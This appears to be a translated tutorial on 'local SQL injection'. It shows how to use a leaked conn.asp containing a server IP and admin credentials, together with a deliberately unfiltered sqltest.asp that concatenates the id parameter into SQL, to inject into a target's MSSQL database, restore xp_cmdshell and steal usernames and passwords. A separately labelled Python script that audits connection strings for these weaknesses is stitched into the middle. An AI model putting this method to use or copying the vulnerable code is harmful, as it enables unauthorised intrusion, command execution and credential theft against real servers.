Local SQL injection strategy analysis exposure

Source: Internet
Author: User

What is local injection? Simply put: you cannot perform SQL injection against the server because its web application is secure, every Request("id") value is strictly filtered, or the input is restricted to a numeric format. Normally you would have to give up on injection.

Sometimes, however, you can inject from your own local IIS instead, sending the data straight to the server's database and avoiding the server's request-parameter handling and filtering altogether. For example, if you happened to obtain the server's conn.asp file through a database-exposure vulnerability or some other flaw, congratulations: the intrusion is not far from success.

The conn.asp file code is generally as follows:

<%
' Opens the application's database connection; the connection string carries the server address, login and password in clear text
Set conn = Server.CreateObject("ADODB.Connection")
conn.Open "PROVIDER=SQLOLEDB;data source=61.121.140.37;UID=admin;pwd=12345;DATABASE=master"
%>

This file records the server's database connection details, usually including the connection password, and here it shows that the back end is MSSQL, which is very useful. If the server had a URL vulnerable to SQL injection, we could restore xp_cmdshell and execute many commands; DOS commands would come for free. Unfortunately, we cannot inject, and the only thing we have is this conn.asp file.
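The weak points that make a leaked conn.asp so dangerous are visible in the connection string itself: a database listening on a public IP address, an application that logs in with a privileged account, a connection to the master database, and a password stored in a file under the web root. The following Python script, an added example that is not part of this article, parses an OLE DB connection string of the form shown above and reports those weaknesses. The hardened string, with its 10.0.0.5 host, forum_app login, Integrated Security setting and forumdb database, is a constructed placeholder, not a configuration from the article; the password in the weak sample is redacted.

```python
"""Audit an ADO/OLE DB connection string for the weaknesses that make a
leaked conn.asp dangerous. Added example, not part of the original article;
the key names (data source, UID, pwd, DATABASE) follow the string shown there."""
import ipaddress

# Constructed samples: WEAK mirrors the article's conn.asp (password redacted),
# HARDENED is an assumed corrected form with placeholder values.
WEAK = "PROVIDER=SQLOLEDB;data source=61.121.140.37;UID=admin;pwd=<redacted>;DATABASE=master"
HARDENED = "PROVIDER=SQLOLEDB;data source=10.0.0.5;Integrated Security=SSPI;DATABASE=forumdb"

PRIVILEGED_LOGINS = {"sa", "admin", "administrator", "root"}
SYSTEM_DATABASES = {"master", "model", "msdb", "tempdb"}


def parse_connection_string(s):
    """Split 'key=value;key=value' into a dict with lowercased keys.
    Keys are case-insensitive in OLE DB; values keep their case."""
    parts = {}
    for piece in s.split(";"):
        if "=" not in piece:
            continue
        key, _, value = piece.partition("=")
        parts[key.strip().lower()] = value.strip()
    return parts


def is_public_host(host):
    """True when the data source is a globally routable IP literal.
    A DNS name cannot be classified offline, so it is reported as not public."""
    host = host.split(",")[0].strip()  # drop an optional ',port' suffix (SQL Server syntax)
    try:
        return ipaddress.ip_address(host).is_global
    except ValueError:
        return False


def audit(s):
    """Return a list of finding strings; an empty list means nothing was flagged."""
    p = parse_connection_string(s)
    findings = []
    host = p.get("data source") or p.get("server", "")
    if is_public_host(host):
        findings.append("database endpoint %s is a public IP: anyone holding the credentials can connect directly" % host)
    login = p.get("uid") or p.get("user id", "")
    if login.lower() in PRIVILEGED_LOGINS:
        findings.append("login '%s' is a privileged account: with it an attacker can enable xp_cmdshell" % login)
    db = p.get("database") or p.get("initial catalog", "")
    if db.lower() in SYSTEM_DATABASES:
        findings.append("initial database '%s' is a system database; the application should use its own database" % db)
    if "pwd" in p or "password" in p:
        findings.append("password is embedded in the file: whoever downloads conn.asp has it")
    return findings


if __name__ == "__main__":
    for label, cs in (("weak", WEAK), ("hardened", HARDENED)):
        print(label, audit(cs) or ["no findings"])
```

Run it over the contents of your own conn.asp. The hardened string produces no findings because each thing the article's attack relies on is gone: the host is not reachable from outside the network, the login cannot enable xp_cmdshell, the session starts in the application's own database, and there is no password in the file to steal.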

So we will trick the server from our local machine, but you need to know which web program the server runs, or you will not be able to write the code below. Write a sqltest.asp file with no filtering at all and put it under wwwroot in your own IIS so that it can be reached through localhost.

The sqltest.asp code is as follows:

<!-- #include file="conn.asp" -->
<%
Dim rs, strSQL, id
Set rs = Server.CreateObject("ADODB.Recordset")
id = Request("id")
' No filtering or type check on id: the parameter is concatenated straight into the SQL text
strSQL = "select * from DVBBSmdb where GuestID=" & id
rs.Open strSQL, conn, 1, 3
rs.Close
%>

DVBBSmdb is a fictitious name; change it to the table name actually used by the target web application's database. Note that the id parameter is not filtered at all: no Replace or other sanitizing functions are applied. Now open the injection URL http://localhost/sqltest.asp?id=1 and inject from there, executing commands on the server or retrieving usernames and passwords; this is equivalent to injecting on the server you want to intrude into, bypassing its anti-injection measures.

This is a local spoofing injection. Do you understand?
